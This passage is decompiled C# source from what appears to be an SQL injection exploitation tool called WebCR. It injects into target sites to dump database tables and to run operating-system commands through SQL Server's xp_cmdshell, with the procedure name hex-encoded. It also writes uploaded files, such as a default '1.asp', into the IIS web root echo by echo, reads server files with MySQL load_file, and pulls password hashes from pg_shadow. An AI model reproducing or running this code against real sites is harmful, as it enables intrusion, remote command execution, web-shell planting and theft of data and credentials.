				string text = listViewData.get_SelectedItems().get_Item(0).get_Text();
				for (int i = 1; i < listViewData.get_SelectedItems().get_Item(0).get_SubItems()
					.get_Count(); i++)
				{
					text = text + "\t" + listViewData.get_SelectedItems().get_Item(0).get_SubItems()
						.get_Item(i)
						.get_Text();
				}
				string text2;
				if ((text2 = ((ToolStripItem)(ToolStripMenuItem)sender).get_Text()) != null && text2 == "Copy Data Row To ClipBoard")
				{
					Clipboard.SetText(text);
				}
			}
			catch
			{
			}
		}

		private void btnGetData_Click(object sender, EventArgs e)
		{
			//IL_0017: Unknown result type (might be due to invalid IL or missing references)
			//IL_007b: Unknown result type (might be due to invalid IL or missing references)
			if (listViewData.get_Columns().get_Count() == 0)
			{
				MessageBox.Show("Please Check the column name!");
				return;
			}
			listViewData.get_Items().Clear();
			InitURL();
			int num;
			int num2;
			try
			{
				num = int.Parse(((ToolStripItem)txtRowsBegin).get_Text());
				num2 = int.Parse(((ToolStripItem)txtRowsEnd).get_Text());
				if (num < 1 || num2 < 1)
				{
					throw new Exception("");
				}
				if (num > num2)
				{
					int num3 = num2;
					num2 = num;
					num = num3;
				}
			}
			catch
			{
				MessageBox.Show("Please Input Interger Number >=1  !");
				return;
			}
			if (mainfrm.CurrentSite.DatabaseType == DBType.UnKnown)
			{
				mainfrm.CurrentSite.DatabaseType = GetDBType(URL);
			}
			if (mainfrm.CurrentSite.DatabaseType == DBType.SQLServer)
			{
				ExecSQLServerGetData(num, num2);
			}
			else if (mainfrm.CurrentSite.DatabaseType == DBType.MySQL)
			{
				ExecMySQLGetData(num, num2);
			}
			else if (mainfrm.CurrentSite.DatabaseType == DBType.Oracle)
			{
				ExecOracleGetData(num, num2);
			}
			else if (mainfrm.CurrentSite.DatabaseType == DBType.DB2)
			{
				ExecDB2GetData(num, num2);
			}
			else if (mainfrm.CurrentSite.DatabaseType == DBType.Access)
			{
				ExecAccessGetData(num, num2);
			}
			else if (mainfrm.CurrentSite.DatabaseType == DBType.PostgreSQL)
			{
				ExecPostgreSQLGetData(num, num2);
			}
			else if (mainfrm.CurrentSite.DatabaseType == DBType.SQLite)
			{
				ExecSQLiteGetData(num, num2);
			}
		}

		public void LoadFromXmlDocument(XmlDocument WcrXml)
		{
			//IL_01a9: Unknown result type (might be due to invalid IL or missing references)
			//IL_01b0: Expected O, but got Unknown
			//IL_01b0: Unknown result type (might be due to invalid IL or missing references)
			//IL_01b7: Expected O, but got Unknown
			//IL_01b7: Unknown result type (might be due to invalid IL or missing references)
			//IL_01be: Expected O, but got Unknown
			//IL_01d3: Unknown result type (might be due to invalid IL or missing references)
			//IL_01da: Expected O, but got Unknown
			//IL_022c: Unknown result type (might be due to invalid IL or missing references)
			//IL_0233: Expected O, but got Unknown
			//IL_027e: Unknown result type (might be due to invalid IL or missing references)
			//IL_0285: Expected O, but got Unknown
			//IL_0359: Unknown result type (might be due to invalid IL or missing references)
			//IL_0360: Expected O, but got Unknown
			//IL_0372: Unknown result type (might be due to invalid IL or missing references)
			//IL_0379: Expected O, but got Unknown
			//IL_03fb: Unknown result type (might be due to invalid IL or missing references)
			try
			{
				string value = ((XmlNode)((XmlNode)WcrXml).SelectSingleNode("//ROOT/CurrentSite/DatabaseType").get_Attributes().get_ItemOf("Value")).get_Value();
				mainfrm.CurrentSite.DatabaseType = (DBType)Enum.Parse(typeof(DBType), value);
				InitByDBType(IsLoadFromFile: true);
				UpdateComboDBType(value);
				string value2 = ((XmlNode)((XmlNode)WcrXml).SelectSingleNode("//ROOT/CurrentSite/CurrentKeyWord").get_Attributes().get_ItemOf("Value")).get_Value();
				mainfrm.CurrentSite.CurrentKeyWord = value2;
				UpdateKeyWordText(value2);
				try
				{
					string value3 = ((XmlNode)((XmlNode)WcrXml).SelectSingleNode("//ROOT/CurrentSite/CurrentInjType").get_Attributes().get_ItemOf("Value")).get_Value();
					mainfrm.CurrentSite.paramType = (ParameterType)Enum.Parse(typeof(ParameterType), value3);
				}
				catch
				{
				}
				try
				{
					XmlNode val = ((XmlNode)WcrXml).SelectSingleNode("//ROOT/CurrentSite/CurrentinjectMethod");
					string value4 = ((XmlNode)val.get_Attributes().get_ItemOf("Value")).get_Value();
					mainfrm.CurrentSite.injectMethod = (InjectMethod)Enum.Parse(typeof(InjectMethod), value4);
					mainfrm.CurrentSite.unionFieldIndex = int.Parse(((XmlNode)val.get_Attributes().get_ItemOf("unionFieldIndex")).get_Value());
					mainfrm.CurrentSite.unionFieldsCount = int.Parse(((XmlNode)val.get_Attributes().get_ItemOf("unionFieldsCount")).get_Value());
				}
				catch
				{
				}
				treeViewDB.get_Nodes().Clear();
				string text = "";
				string text2 = "";
				string text3 = "";
				XmlNodeList val2 = ((XmlNode)WcrXml).SelectNodes("//ROOT/SiteDBStructure/Database");
				TreeNode val3 = new TreeNode();
				TreeNode val4 = new TreeNode();
				TreeNode val5 = new TreeNode();
				foreach (XmlNode item in val2)
				{
					XmlNode val6 = item;
					text = ((XmlNode)val6.get_Attributes().get_ItemOf("Text")).get_Value();
					val3 = treeViewDB.get_Nodes().Add(text);
					val3.set_ImageKey("db.png");
					foreach (XmlNode childNode in val6.get_ChildNodes())
					{
						XmlNode val7 = childNode;
						text2 = ((XmlNode)val7.get_Attributes().get_ItemOf("Text")).get_Value();
						val4 = val3.get_Nodes().Add(text2);
						val4.set_ImageKey("table.png");
						foreach (XmlNode childNode2 in val7.get_ChildNodes())
						{
							XmlNode val8 = childNode2;
							text3 = ((XmlNode)val8.get_Attributes().get_ItemOf("Text")).get_Value();
							val5 = val4.get_Nodes().Add(text3);
							val5.set_ImageKey("column.png");
						}
					}
				}
				treeViewDB.ExpandAll();
				XmlNodeList val9 = ((XmlNode)WcrXml).SelectNodes("//ROOT/SiteSQLEnv/EnvRow");
				listViewEnv.get_Items().Clear();
				foreach (XmlNode item2 in val9)
				{
					XmlNode val10 = item2;
					ListViewItem val11 = new ListViewItem(val10.get_ChildNodes().get_ItemOf(0).get_InnerText());
					val11.get_SubItems().Add(val10.get_ChildNodes().get_ItemOf(1).get_InnerText());
					listViewEnv.get_Items().Add(val11);
				}
				URL = ((XmlNode)((XmlNode)WcrXml).SelectSingleNode("//ROOT/CurrentSite/URL").get_Attributes().get_ItemOf("Value")).get_Value();
			}
			catch (Exception ex)
			{
				MessageBox.Show(ex.Message);
			}
		}

		private void btnImpDB_Click(object sender, EventArgs e)
		{
			//IL_0020: Unknown result type (might be due to invalid IL or missing references)
			//IL_0026: Invalid comparison between Unknown and I4
			//IL_003a: Unknown result type (might be due to invalid IL or missing references)
			//IL_0040: Expected O, but got Unknown
			//IL_0057: Unknown result type (might be due to invalid IL or missing references)
			//IL_0072: Unknown result type (might be due to invalid IL or missing references)
			//IL_0078: Expected O, but got Unknown
			//IL_008f: Unknown result type (might be due to invalid IL or missing references)
			try
			{
				if (treeViewDB.get_Nodes().get_Count() <= 0)
				{
					goto IL_003a;
				}
				if ((int)MessageBox.Show("* Import Database Will Clear Current Database Information.\r\n* Continue?\r\n", "Confirm", (MessageBoxButtons)1, (MessageBoxIcon)64) == 2)
				{
					return;
				}
				treeViewDB.get_Nodes().Clear();
				goto IL_003a;
				IL_003a:
				OpenFileDialog val = new OpenFileDialog();
				((FileDialog)val).set_Filter("XML File(*.xml)|*.xml");
				((FileDialog)val).set_InitialDirectory(Application.get_StartupPath());
				((CommonDialog)val).ShowDialog();
				string fileName = ((FileDialog)val).get_FileName();
				((Component)val).Dispose();
				if (!string.IsNullOrEmpty(fileName))
				{
					XmlDocument val2 = new XmlDocument();
					val2.Load(fileName);
					LoadFromXmlDocument(val2);
				}
			}
			catch (Exception ex)
			{
				MessageBox.Show(ex.Message);
			}
		}

		public XmlDocument GetXmlDocumentFromEnv()
		{
			//IL_0000: Unknown result type (might be due to invalid IL or missing references)
			//IL_0006: Expected O, but got Unknown
			XmlDocument val = new XmlDocument();
			XmlNode val2 = (XmlNode)(object)val.CreateXmlDeclaration("1.0", "utf-8", "");
			((XmlNode)val).AppendChild(val2);
			XmlElement val3 = val.CreateElement("ROOT");
			((XmlNode)val).AppendChild((XmlNode)(object)val3);
			XmlElement val4 = val.CreateElement("SiteSQLEnv");
			((XmlNode)val3).AppendChild((XmlNode)(object)val4);
			for (int i = 0; i < listViewEnv.get_Items().get_Count(); i++)
			{
				ListViewItem val5 = listViewEnv.get_Items().get_Item(i);
				XmlElement val6 = val.CreateElement("EnvRow");
				XmlElement val7 = val.CreateElement("Environment");
				((XmlNode)val7).set_InnerText(val5.get_SubItems().get_Item(0).get_Text());
				((XmlNode)val6).AppendChild((XmlNode)(object)val7);
				val7 = val.CreateElement("Value");
				if (val5.get_SubItems().get_Count() < 2)
				{
					((XmlNode)val7).set_InnerText("");
				}
				else
				{
					((XmlNode)val7).set_InnerText(val5.get_SubItems().get_Item(1).get_Text());
				}
				((XmlNode)val6).AppendChild((XmlNode)(object)val7);
				((XmlNode)val4).AppendChild((XmlNode)(object)val6);
			}
			return val;
		}

		public XmlDocument GetXmlDocumentFromDBTree()
		{
			//IL_0000: Unknown result type (might be due to invalid IL or missing references)
			//IL_0006: Expected O, but got Unknown
			//IL_007f: Unknown result type (might be due to invalid IL or missing references)
			//IL_0086: Expected O, but got Unknown
			//IL_00e6: Unknown result type (might be due to invalid IL or missing references)
			//IL_00ed: Expected O, but got Unknown
			//IL_0170: Unknown result type (might be due to invalid IL or missing references)
			//IL_0177: Expected O, but got Unknown
			XmlDocument val = new XmlDocument();
			XmlNode val2 = (XmlNode)(object)val.CreateXmlDeclaration("1.0", "utf-8", "");
			((XmlNode)val).AppendChild(val2);
			XmlElement val3 = val.CreateElement("ROOT");
			((XmlNode)val).AppendChild((XmlNode)(object)val3);
			XmlElement val4 = val.CreateElement("SiteDBStructure");
			((XmlNode)val3).AppendChild((XmlNode)(object)val4);
			string text = "";
			string text2 = "";
			string text3 = "";
			foreach (TreeNode node in treeViewDB.get_Nodes())
			{
				TreeNode val5 = node;
				text = val5.get_Text();
				XmlElement val6 = val.CreateElement("Database");
				val6.SetAttribute("Text", text);
				((XmlNode)val4).AppendChild((XmlNode)(object)val6);
				XmlNode val7 = ((XmlNode)val).SelectSingleNode("//ROOT/SiteDBStructure/Database[@Text=\"" + text + "\"]");
				foreach (TreeNode node2 in val5.get_Nodes())
				{
					TreeNode val8 = node2;
					text2 = val8.get_Text();
					XmlElement val9 = val.CreateElement("Table");
					val9.SetAttribute("Text", text2);
					val7.AppendChild((XmlNode)(object)val9);
					XmlNode val10 = ((XmlNode)val).SelectSingleNode("//ROOT/SiteDBStructure/Database[@Text=\"" + text + "\"]/Table[@Text=\"" + text2 + "\"]");
					foreach (TreeNode node3 in val8.get_Nodes())
					{
						TreeNode val11 = node3;
						text3 = val11.get_Text();
						XmlElement val12 = val.CreateElement("Column");
						val12.SetAttribute("Text", text3);
						val10.AppendChild((XmlNode)(object)val12);
					}
				}
			}
			return val;
		}

		private void btnExpDB_Click(object sender, EventArgs e)
		{
			//IL_0033: Unknown result type (might be due to invalid IL or missing references)
			//IL_0039: Expected O, but got Unknown
			//IL_0057: Unknown result type (might be due to invalid IL or missing references)
			//IL_005c: Unknown result type (might be due to invalid IL or missing references)
			//IL_005d: Unknown result type (might be due to invalid IL or missing references)
			//IL_005f: Invalid comparison between Unknown and I4
			//IL_008e: Unknown result type (might be due to invalid IL or missing references)
			//IL_009f: Unknown result type (might be due to invalid IL or missing references)
			try
			{
				if (treeViewDB.get_Nodes().get_Count() >= 1)
				{
					string fileName = mainfrm.CurrentSite.DomainHost + "_DB.xml";
					SaveFileDialog val = new SaveFileDialog();
					((FileDialog)val).set_Filter("XML File(*.xml) | *.xml");
					((FileDialog)val).set_InitialDirectory(Application.get_StartupPath());
					((FileDialog)val).set_FileName(fileName);
					DialogResult val2 = ((CommonDialog)val).ShowDialog();
					if ((int)val2 == 1)
					{
						fileName = ((FileDialog)val).get_FileName();
						((Component)val).Dispose();
						XmlDocument xmlDocumentFromDBTree = GetXmlDocumentFromDBTree();
						xmlDocumentFromDBTree.Save(fileName);
						MessageBox.Show("* Export OK!\r\n* FileName: " + fileName, "Done");
					}
				}
			}
			catch (Exception ex)
			{
				MessageBox.Show(ex.Message);
			}
		}

		private void btnExpData_Click(object sender, EventArgs e)
		{
			//IL_002e: Unknown result type (might be due to invalid IL or missing references)
			//IL_0034: Expected O, but got Unknown
			//IL_0052: Unknown result type (might be due to invalid IL or missing references)
			//IL_0057: Unknown result type (might be due to invalid IL or missing references)
			//IL_0058: Unknown result type (might be due to invalid IL or missing references)
			//IL_005a: Invalid comparison between Unknown and I4
			if (listViewData.get_Items().get_Count() != 0)
			{
				string fileName = mainfrm.CurrentSite.DomainHost + "_Data.xls";
				SaveFileDialog val = new SaveFileDialog();
				((FileDialog)val).set_Filter("XLS File(*.xls) | *.xls");
				((FileDialog)val).set_InitialDirectory(Application.get_StartupPath());
				((FileDialog)val).set_FileName(fileName);
				DialogResult val2 = ((CommonDialog)val).ShowDialog();
				if ((int)val2 == 1)
				{
					fileName = ((FileDialog)val).get_FileName();
					mainfrm.DisplayLogList("Exporting Data...");
					ThreadPool.QueueUserWorkItem(new WaitCallback(ExportListViewData), fileName);
				}
			}
		}

		private void ExportListViewData(object FileName)
		{
			//IL_015d: Unknown result type (might be due to invalid IL or missing references)
			//IL_016e: Unknown result type (might be due to invalid IL or missing references)
			if (!((Control)listViewData).get_InvokeRequired())
			{
				try
				{
					string text = (string)FileName;
					StreamWriter streamWriter = File.CreateText(text);
					string text2 = "";
					for (int i = 0; i < listViewData.get_Columns().get_Count(); i++)
					{
						if (!string.IsNullOrEmpty(text2))
						{
							text2 += "\t";
						}
						text2 += listViewData.get_Columns().get_Item(i).get_Text();
					}
					streamWriter.WriteLine(text2);
					text2 = "";
					for (int j = 0; j < listViewData.get_Items().get_Count(); j++)
					{
						text2 += listViewData.get_Items().get_Item(j).get_Text();
						int count = listViewData.get_Items().get_Item(j).get_SubItems()
							.get_Count();
						for (int k = 1; k < listViewData.get_Columns().get_Count(); k++)
						{
							text2 = ((k >= count) ? (text2 + "\t ") : (text2 + "\t" + listViewData.get_Items().get_Item(j).get_SubItems()
								.get_Item(k)
								.get_Text()));
						}
						streamWriter.WriteLine(text2);
						text2 = "";
					}
					streamWriter.Close();
					MessageBox.Show("Export OK!", "Done");
				}
				catch (Exception ex)
				{
					MessageBox.Show(ex.Message);
				}
			}
			else
			{
				dd dd = ExportListViewData;
				((Control)this).Invoke((Delegate)dd, new object[1]
				{
					FileName
				});
			}
		}

		private void AddItem2listBoxCMD(string ItemText)
		{
			if (!((Control)listBoxCMD).get_InvokeRequired())
			{
				listBoxCMD.get_Items().Add((object)ItemText);
				((Control)listBoxCMD).Refresh();
			}
			else
			{
				dd dd = AddItem2listBoxCMD;
				((Control)this).Invoke((Delegate)dd, new object[1]
				{
					ItemText
				});
			}
		}

		private void btnCMD_Click(object sender, EventArgs e)
		{
			//IL_026b: Unknown result type (might be due to invalid IL or missing references)
			//IL_02bf: Unknown result type (might be due to invalid IL or missing references)
			mainfrm.DisplayLogList("Executing Command ...");
			string text = ((ToolStripItem)txtCMD).get_Text();
			if (string.IsNullOrEmpty(text))
			{
				return;
			}
			listBoxCMD.get_Items().Clear();
			if (mainfrm.CurrentSite.DatabaseType == DBType.UnKnown)
			{
				mainfrm.CurrentSite.DatabaseType = GetDBType(URL);
			}
			if (mainfrm.CurrentSite.paramType == ParameterType.UnKnown)
			{
				mainfrm.CurrentSite.paramType = GetParameterType();
			}
			if (mainfrm.CurrentSite.injectMethod == InjectMethod.ToBeDetect)
			{
				GetInjectMethod(URL);
			}
			if (mainfrm.CurrentSite.DatabaseType == DBType.SQLServer)
			{
				string text2 = mainfrm.CurrentSite.EscapeSingleQuotes(text, DBType.SQLServer);
				TempTbNum++;
				string TempTableName = "WCRTEMP" + $"{TempTbNum:D5}";
				string FullURL = URL + PreFix + ";create table " + TempTableName + "(tmp nvarchar(4000))%3B%2D%2D";
				mainfrm.CurrentSite.GetSourceCodeWithEscapeSpaceOption(FullURL, mainfrm.ReqType, vulnSQL.needEscapeSpace, vulnSQL.vulnPostEncType);
				FullURL = URL + PreFix + ";declare @a nvarchar(4000);set @a=" + text2 + ";insert into " + TempTableName + "(tmp) exec master.dbo.xp_cmdshell @a;alter table " + TempTableName + " add id int not null identity (1,1)%2D%2D";
				mainfrm.CurrentSite.GetSourceCodeWithEscapeSpaceOption(FullURL, mainfrm.ReqType, vulnSQL.needEscapeSpace, vulnSQL.vulnPostEncType);
				int RowNum;
				try
				{
					RowNum = int.Parse(GetItemBySQLServer("select", "convert(varchar(10),count(1))", "from " + TempTableName, 126, 1024, NeedTempTable: false));
				}
				catch
				{
					MessageBox.Show("Get CMD Result Row Number Error!");
					RowNum = 0;
				}
				Thread GetCMDRow = new Thread((ThreadStart)delegate
				{
					for (int i = 0; i < RowNum; i++)
					{
						string itemBySQLServer = GetItemBySQLServer("select%20top%201", "isnull(tmp,char(32))", "from " + TempTableName + " where id=" + (i + 1), 255, 255, NeedTempTable: false);
						itemBySQLServer = itemBySQLServer.Replace("&lt;", "<").Replace("&gt;", ">");
						AddItem2listBoxCMD(itemBySQLServer);
					}
				});
				Thread thread = new Thread((ThreadStart)delegate
				{
					GetCMDRow.Join();
					FullURL = URL + PreFix + ";drop table " + TempTableName + "%3B%2D%2D";
					mainfrm.CurrentSite.GetSourceCodeWithEscapeSpaceOption(FullURL, mainfrm.ReqType, vulnSQL.needEscapeSpace, vulnSQL.vulnPostEncType);
				});
				GetCMDRow.Start();
				thread.Start();
			}
			else
			{
				MessageBox.Show("Sorry, It Suppot SQL Server Only!", "Information");
			}
		}

		private void btnDBCMD_Click(object sender, EventArgs e)
		{
			//IL_020d: Unknown result type (might be due to invalid IL or missing references)
			mainfrm.DisplayLogList("Executing DB Command ...");
			string text = ((ToolStripItem)txtDBCMD).get_Text();
			if (string.IsNullOrEmpty(text))
			{
				return;
			}
			if (mainfrm.CurrentSite.DatabaseType == DBType.UnKnown)
			{
				mainfrm.CurrentSite.DatabaseType = GetDBType(URL);
			}
			if (mainfrm.CurrentSite.paramType == ParameterType.UnKnown)
			{
				mainfrm.CurrentSite.paramType = GetParameterType();
			}
			if (mainfrm.CurrentSite.paramType == ParameterType.NotInjectable)
			{
				return;
			}
			if (mainfrm.CurrentSite.injectMethod == InjectMethod.ToBeDetect)
			{
				GetInjectMethod(URL);
			}
			if (mainfrm.CurrentSite.DatabaseType == DBType.SQLServer)
			{
				if (string.IsNullOrEmpty(mainfrm.CurrentSite.WebRoot))
				{
					mainfrm.CurrentSite.WebRoot = GetIISWebRoot(URL);
				}
				string uRL = URL + PreFix + ";exec master..sp_makewebtask @outputfile=" + mainfrm.CurrentSite.EscapeSingleQuotes(mainfrm.CurrentSite.WebRoot + "\\WebCR.htm", DBType.SQLServer) + ",@query=%27" + text + "%27%2D%2D";
				mainfrm.CurrentSite.GetSourceCodeWithEscapeSpaceOption(uRL, mainfrm.ReqType, vulnSQL.needEscapeSpace, vulnSQL.vulnPostEncType);
				if (DateTime.Now.Subtract(mainfrm.CurrentSite.LastModifiedTime).Seconds < 30)
				{
					mainfrm.SelectTool("WebBrowser");
					mainfrm.NavigatePage(mainfrm.CurrentSite.HTTPRoot + "WebCR.htm", RequestType.GET, "");
				}
				else
				{
					MessageBox.Show("Execute DB SQL Failed!", "Information");
				}
			}
		}

		private void MySQLReadFile(object Filename)
		{
			string itemName = (string)Filename;
			itemName = mainfrm.CurrentSite.EscapeSingleQuotes(itemName, DBType.MySQL);
			string itemByMySQL = GetItemByMySQL("select", "load_file(" + itemName + ")", "", 255, 255);
			UpdateTextBoxText(txtFileContent, itemByMySQL);
		}

		private void UpdateTextBoxText(TextBox txtBox, string Text)
		{
			TxtBoxInfo textBoxText = default(TxtBoxInfo);
			textBoxText.txtBox = txtBox;
			textBoxText.Text = Text;
			SetTextBoxText(textBoxText);
		}

		private void SetTextBoxText(TxtBoxInfo txtBoxInfo)
		{
			//IL_0052: Unknown result type (might be due to invalid IL or missing references)
			try
			{
				if (!((Control)txtBoxInfo.txtBox).get_InvokeRequired())
				{
					((Control)txtBoxInfo.txtBox).set_Text(txtBoxInfo.Text);
					return;
				}
				ddSetTextBox ddSetTextBox = SetTextBoxText;
				((Control)this).Invoke((Delegate)ddSetTextBox, new object[1]
				{
					txtBoxInfo
				});
			}
			catch (Exception ex)
			{
				MessageBox.Show(ex.Message);
			}
		}

		private void btnReadFile_Click(object sender, EventArgs e)
		{
			if (mainfrm.CurrentSite.DatabaseType == DBType.MySQL)
			{
				string state = ((ToolStripItem)txtFileName).get_Text().Trim();
				ThreadPool.QueueUserWorkItem(new WaitCallback(MySQLReadFile), state);
			}
		}

		private void listViewEnv_MouseClick(object sender, MouseEventArgs e)
		{
			//IL_0032: Unknown result type (might be due to invalid IL or missing references)
			//IL_0038: Expected O, but got Unknown
			if (listViewEnv.get_SelectedItems().get_Count() >= 1 && listViewEnv.get_SelectedItems().get_Item(0).get_SubItems()
				.get_Count() > 1)
			{
				ContextMenuStrip val = new ContextMenuStrip();
				((ToolStrip)val).get_Items().Add("Copy Value To ClipBoard", (Image)null, (EventHandler)ListViewInfoItemClick);
				((Control)listViewEnv).set_ContextMenuStrip(val);
			}
		}

		private void ListViewInfoItemClick(object sender, EventArgs e)
		{
			//IL_0001: Unknown result type (might be due to invalid IL or missing references)
			try
			{
				string text;
				if ((text = ((ToolStripItem)(ToolStripMenuItem)sender).get_Text()) != null && text == "Copy Value To ClipBoard")
				{
					Clipboard.SetText(listViewEnv.get_SelectedItems().get_Item(0).get_SubItems()
						.get_Item(1)
						.get_Text());
				}
			}
			catch
			{
			}
		}

		public void EnableFunc(bool RegOK)
		{
			((Control)toolStripDB).set_Enabled(RegOK);
		}

		private void btnSelectFile_Click(object sender, EventArgs e)
		{
			//IL_0000: Unknown result type (might be due to invalid IL or missing references)
			//IL_0006: Expected O, but got Unknown
			//IL_001d: Unknown result type (might be due to invalid IL or missing references)
			//IL_0022: Unknown result type (might be due to invalid IL or missing references)
			//IL_0023: Unknown result type (might be due to invalid IL or missing references)
			//IL_0025: Invalid comparison between Unknown and I4
			OpenFileDialog val = new OpenFileDialog();
			((FileDialog)val).set_Filter("ASP File(*.asp)|*.asp|Text File(*.txt)|*.txt|All File(*.*)|*.*");
			((FileDialog)val).set_InitialDirectory(Application.get_StartupPath());
			DialogResult val2 = ((CommonDialog)val).ShowDialog();
			if ((int)val2 == 1)
			{
				((Control)txtUploadFile).set_Text(((FileDialog)val).get_FileName());
				if (!string.IsNullOrEmpty(mainfrm.CurrentSite.WebRoot))
				{
					((Control)txtTargetFileName).set_Text(mainfrm.CurrentSite.WebRoot + "\\1.asp");
				}
			}
		}

		private void btnFileUpload_Click(object sender, EventArgs e)
		{
			//IL_0232: Unknown result type (might be due to invalid IL or missing references)
			string text = ((Control)txtUploadFile).get_Text().Trim();
			string text2 = ((Control)txtTargetFileName).get_Text().Trim();
			if (string.IsNullOrEmpty(text) || string.IsNullOrEmpty(text2))
			{
				return;
			}
			StreamReader streamReader = new StreamReader(text);
			string text3 = "";
			string text4 = "";
			int num = 1;
			string itemName = "echo.>" + text2;
			InitURL();
			text4 = URL + PreFix + ";declare @e sysname,@c sysname;set @e=0x6D00610073007400650072002E002E00780070005F0063006D0064007300680065006C006C00;set @c=" + mainfrm.CurrentSite.EscapeSingleQuotes(itemName, DBType.SQLServer) + ";exec @e @c;--";
			mainfrm.CurrentSite.GetSourceCodeWithEscapeSpaceOption(text4, mainfrm.ReqType, vulnSQL.needEscapeSpace, vulnSQL.vulnPostEncType);
			while ((text3 = streamReader.ReadLine()) != null)
			{
				text3 = text3.Replace("^", "^^").Replace("<", "^<").Replace(">", "^>")
					.Replace("|", "^|")
					.Replace("&", "^&");
				text3 = text3.Replace("\"", "^\"").Replace("'", "^'").Trim();
				if (!string.IsNullOrEmpty(text3))
				{
					itemName = "echo " + text3 + ">>" + text2;
					text4 = URL + PreFix + ";declare @e sysname,@c sysname;set @e=0x6D00610073007400650072002E002E00780070005F0063006D0064007300680065006C006C00;set @c=" + mainfrm.CurrentSite.EscapeSingleQuotes(itemName, DBType.SQLServer) + ";exec @e @c;--";
					mainfrm.CurrentSite.GetSourceCodeWithEscapeSpaceOption(text4, mainfrm.ReqType, vulnSQL.needEscapeSpace, vulnSQL.vulnPostEncType);
					mainfrm.DisplayLogList("Uploading Row: " + num);
					num++;
				}
			}
			MessageBox.Show("Upload Complete!", "Done", (MessageBoxButtons)0, (MessageBoxIcon)64);
		}

		private void btnGetWebRoot_Click(object sender, EventArgs e)
		{
			//IL_0036: Unknown result type (might be due to invalid IL or missing references)
			if (string.IsNullOrEmpty(mainfrm.CurrentSite.WebRoot))
			{
				string iISWebRoot = GetIISWebRoot(URL);
				if (string.IsNullOrEmpty(iISWebRoot))
				{
					MessageBox.Show("Get Web Root Failed!", "Notice");
					return;
				}
				mainfrm.CurrentSite.WebRoot = iISWebRoot;
			}
			((Control)txtTargetFileName).set_Text(mainfrm.CurrentSite.WebRoot + "\\");
		}

		private void btnEncode_Click(object sender, EventArgs e)
		{
			//IL_001f: Unknown result type (might be due to invalid IL or missing references)
			//IL_0047: Unknown result type (might be due to invalid IL or missing references)
			if (mainfrm.CurrentSite.DatabaseType == DBType.UnKnown)
			{
				MessageBox.Show("Please Select the DataBase Type!", "Notice", (MessageBoxButtons)0, (MessageBoxIcon)64);
				return;
			}
			string text = ((Control)txtSourceString).get_Text();
			if (string.IsNullOrEmpty(text))
			{
				MessageBox.Show("Please input the source string!", "Notice", (MessageBoxButtons)0, (MessageBoxIcon)64);
				return;
			}
			string text2 = mainfrm.CurrentSite.EscapeSingleQuotes(text, mainfrm.CurrentSite.DatabaseType);
			((Control)txtEscapeString).set_Text(text2);
		}

		public void SelectTabByName(string TabName)
		{
			tabSQLInjection.SelectTab(TabName);
		}

		private void ButtonResetSQL_Click(object sender, EventArgs e)
		{
			//IL_008e: Unknown result type (might be due to invalid IL or missing references)
			//IL_0094: Expected O, but got Unknown
			//IL_00d0: Unknown result type (might be due to invalid IL or missing references)
			//IL_00d6: Expected O, but got Unknown
			mainfrm.CurrentSite.DatabaseType = DBType.UnKnown;
			UpdateComboDBType("UnKnown");
			UpdateKeyWordText("");
			mainfrm.CurrentSite.paramType = ParameterType.UnKnown;
			mainfrm.CurrentSite.unionFieldsCount = 0;
			mainfrm.CurrentSite.unionFieldIndex = 0;
			UpdateComboInjType("UnKnown");
			listViewEnv.get_Items().Clear();
			foreach (TreeNode node in treeViewDB.get_Nodes())
			{
				TreeNode val = node;
				val.Remove();
			}
			foreach (ListViewItem item in listViewData.get_Items())
			{
				ListViewItem val2 = item;
				val2.Remove();
			}
		}

		private void btnDecode_Click(object sender, EventArgs e)
		{
			string text = ((Control)txtEscapeString).get_Text();
			string text2 = DecodeDatabaseSpecificString(text);
			((Control)txtSourceString).set_Text(text2);
		}

		private void btnReset_Click(object sender, EventArgs e)
		{
			//IL_006c: Unknown result type (might be due to invalid IL or missing references)
			//IL_0072: Expected O, but got Unknown
			//IL_00ae: Unknown result type (might be due to invalid IL or missing references)
			//IL_00b4: Expected O, but got Unknown
			mainfrm.CurrentSite.DatabaseType = DBType.UnKnown;
			UpdateComboDBType("UnKnown");
			UpdateKeyWordText("");
			mainfrm.CurrentSite.paramType = ParameterType.UnKnown;
			UpdateComboInjType("UnKnown");
			listViewEnv.get_Items().Clear();
			foreach (TreeNode node in treeViewDB.get_Nodes())
			{
				TreeNode val = node;
				val.Remove();
			}
			foreach (ListViewItem item in listViewData.get_Items())
			{
				ListViewItem val2 = item;
				val2.Remove();
			}
		}

		private void ExecPostgreSQLCheck(object data)
		{
			for (int i = 0; i < listViewEnv.get_Items().get_Count(); i++)
			{
				if (!IsListViewEnvCheckedAt(i))
				{
					continue;
				}
				string text = ReadListViewInfoItems(i);
				if (text.Equals("Version"))
				{
					string itemByPostgreSQL = GetItemByPostgreSQL("select", "version()", "", 126, 64);
					AddSubItem2ListViewInfo(i + "^" + itemByPostgreSQL);
				}
				else if (text.Equals("Server"))
				{
					if (string.IsNullOrEmpty(Server))
					{
						Server = GetServer(URL);
					}
					if (string.IsNullOrEmpty(Server))
					{
						Server = "NULL";
					}
					AddSubItem2ListViewInfo(i + "^" + Server);
				}
				else if (text.Equals("Database"))
				{
					string itemByPostgreSQL2 = GetItemByPostgreSQL("select", "current_database()", "", 255, 62);
					AddSubItem2ListViewInfo(i + "^" + itemByPostgreSQL2);
					if (!string.IsNullOrEmpty(itemByPostgreSQL2))
					{
						AddDB2TreeView(itemByPostgreSQL2);
					}
				}
				else if (text.Equals("user"))
				{
					string itemByPostgreSQL3 = GetItemByPostgreSQL("select", "user", "", 255, 32);
					AddSubItem2ListViewInfo(i + "^" + itemByPostgreSQL3);
				}
				else if (text.Equals("user_PasswordHash"))
				{
					string itemByPostgreSQL4 = GetItemByPostgreSQL("select", "passwd", "from pg_shadow where usename=user limit 1", 255, 32);
					AddSubItem2ListViewInfo(i + "^" + itemByPostgreSQL4);
				}
			}
		}

		private string GetItemByPostgreSQL(string SelectExpression, string ItemName, string FromExpression, int MaxChar, int MaxLength)
		{
			string text = "";
			try
			{
				if (WebSite.CurrentStatus == TaskStatus.Stop)
				{
					return "";
				}
				if (mainfrm.CurrentSite.injectMethod == InjectMethod.ToBeDetect)
				{
					GetInjectMethod(URL);
				}
				if (mainfrm.CurrentSite.injectMethod == InjectMethod.UnionBased)
				{
					text = GetItemByFieldEcho(SelectExpression, ItemName, FromExpression, NeedTempTable: false);
					if (!string.IsNullOrEmpty(text))
					{
						return text;
					}
				}
				mainfrm.CurrentSite.CurrentKeyWord = GetKeyWord(URL, skipScanned: true);
